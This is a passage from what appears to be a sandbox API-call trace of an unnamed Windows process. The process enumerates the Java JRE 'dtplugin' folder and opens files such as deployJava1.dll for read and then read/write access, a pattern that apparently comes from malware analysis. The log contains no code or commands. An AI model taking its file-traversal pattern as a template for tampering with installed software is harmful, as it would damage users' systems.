ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa742cea6, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="dtplugin", cAlternateFileName="")) returned 1 [0090.425] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0090.425] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0090.425] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0090.425] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0090.425] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0090.425] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0090.425] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0090.425] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0090.425] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0090.425] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35250 [0090.425] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0090.425] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35250 | out: hHeap=0x20000) returned 1 [0090.425] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0090.425] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0090.425] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0090.425] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0090.425] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0090.425] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd98 [0090.425] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0090.425] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x69db0 [0090.425] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd98 | out: hHeap=0x20000) returned 1 [0090.425] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0090.425] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0090.425] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0090.425] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.425] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.425] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.425] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.425] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0090.425] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0090.425] AreFileApisANSI () returned 1 [0090.426] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dtplugin", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dtplugin", lpUsedDefaultChar=0x0) returned 48 [0090.426] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0090.426] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.426] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.426] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0090.426] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0090.426] AreFileApisANSI () returned 1 [0090.426] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df88, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 48 [0090.426] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0090.426] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df88, cbMultiByte=-1, lpWideCharStr=0x71688, cchWideChar=48 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dtplugin") returned 48 [0090.426] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dtplugin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\dtplugin"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0090.426] GetLastError () returned 0x5 [0090.426] GetLastError () returned 0x5 [0090.426] SetLastError (dwErrCode=0x5) [0090.426] GetLastError () returned 0x5 [0090.426] SetLastError (dwErrCode=0x5) [0090.426] GetLastError () returned 0x5 [0090.426] SetLastError (dwErrCode=0x5) [0090.426] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0090.426] AreFileApisANSI () returned 1 [0090.426] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df88, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 48 [0090.426] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0090.426] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df88, cbMultiByte=-1, lpWideCharStr=0x719c8, cchWideChar=48 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dtplugin") returned 48 [0090.427] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dtplugin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\dtplugin"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0090.427] GetLastError () returned 0x5 [0090.427] GetLastError () returned 0x5 [0090.427] SetLastError (dwErrCode=0x5) [0090.427] GetLastError () returned 0x5 [0090.427] SetLastError (dwErrCode=0x5) [0090.427] GetLastError () returned 0x5 [0090.427] SetLastError (dwErrCode=0x5) [0090.427] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0090.427] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0090.427] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0090.427] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0090.427] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.427] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.427] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.427] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.427] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d058 [0090.427] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0090.427] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a3b0 [0090.427] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d058 | out: hHeap=0x20000) returned 1 [0090.427] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0090.427] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71828 [0090.427] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0090.427] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa742cea6, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa742cea6, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa742cea6, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x7440, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="dt_shmem.dll", cAlternateFileName="")) returned 1 [0090.427] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0090.427] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0090.427] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0090.427] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0090.427] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0090.427] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0090.427] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0090.427] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0090.427] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0090.427] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35090 [0090.428] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0090.428] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0090.428] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a530 [0090.428] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0090.428] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dtplugin\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78150 [0090.428] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa742cea6, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa0f2891a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa742cea6, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.429] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa742cea6, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa742cea6, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa742cea6, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xfa840, dwReserved0=0x0, dwReserved1=0x0, cFileName="deployJava1.dll", cAlternateFileName="DEPLOY~1.DLL")) returned 1 [0090.429] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0090.429] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0090.429] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0090.429] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0090.429] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0090.429] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0090.429] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0090.429] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0090.429] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0090.429] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0090.429] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0090.429] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46208 [0090.429] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71828 | out: hHeap=0x20000) returned 1 [0090.429] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0090.429] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0090.429] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0090.429] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0090.429] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0090.429] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0090.429] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0090.429] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0090.429] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0090.429] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0090.429] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0090.429] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a828 [0090.429] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0090.429] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0090.429] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e470 [0090.429] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a828 | out: hHeap=0x20000) returned 1 [0090.429] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.429] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.429] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.429] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.430] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e470 | out: hHeap=0x20000) returned 1 [0090.430] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0090.430] AreFileApisANSI () returned 1 [0090.430] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dtplugin\\deployJava1.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dtplugin\\deployJava1.dll", lpUsedDefaultChar=0x0) returned 64 [0090.430] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53520 [0090.430] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.430] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.430] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0090.430] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0090.430] AreFileApisANSI () returned 1 [0090.430] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 64 [0090.430] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ebe0 [0090.430] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x6ebe0, cchWideChar=64 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dtplugin\\deployJava1.dll") returned 64 [0090.430] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dtplugin\\deployJava1.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\dtplugin\\deployjava1.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0090.430] GetFileType (hFile=0x368) returned 0x1 [0090.430] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0090.431] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0090.431] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0090.431] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0090.431] CloseHandle (hObject=0x368) returned 1 [0090.431] AreFileApisANSI () returned 1 [0090.431] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 64 [0090.431] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6dfa8 [0090.431] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x6dfa8, cchWideChar=64 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dtplugin\\deployJava1.dll") returned 64 [0090.431] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dtplugin\\deployJava1.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\dtplugin\\deployjava1.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0090.431] GetFileType (hFile=0x368) returned 0x1 [0090.432] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6dfa8 | out: hHeap=0x20000) returned 1 [0090.432] CloseHandle (hObject=0x368) returned 1 [0090.432] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0090.432] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0090.432] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0090.432] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0090.432] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0090.432] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0090.432] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0090.432] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0090.432] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0090.432] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0090.432] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0090.432] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0090.432] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0090.432] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0090.432] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0090.432] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0090.432] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0090.432] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0090.432] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0090.432] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0090.432] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0090.432] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0090.432] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0090.432] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0090.432] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0090.432] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0090.432] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0090.432] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0090.432] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0090.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0090.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0090.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0090.433] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0090.433] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0090.433] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0090.433] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0090.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0090.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0090.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0090.433] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0090.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0090.433] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0090.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0090.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0090.433] AreFileApisANSI () returned 1 [0090.433] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 64 [0090.433] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e470 [0090.433] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x6e470, cchWideChar=64 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dtplugin\\deployJava1.dll") returned 64 [0090.433] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dtplugin\\deployJava1.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\dtplugin\\deployjava1.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa742cea6, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa742cea6, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa742cea6, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xfa840)) returned 1 [0090.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e470 | out: hHeap=0x20000) returned 1 [0090.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0090.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0090.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53520 | out: hHeap=0x20000) returned 1 [0090.433] InitOnceExecuteOnce (in: InitOnce=0x1086e18, 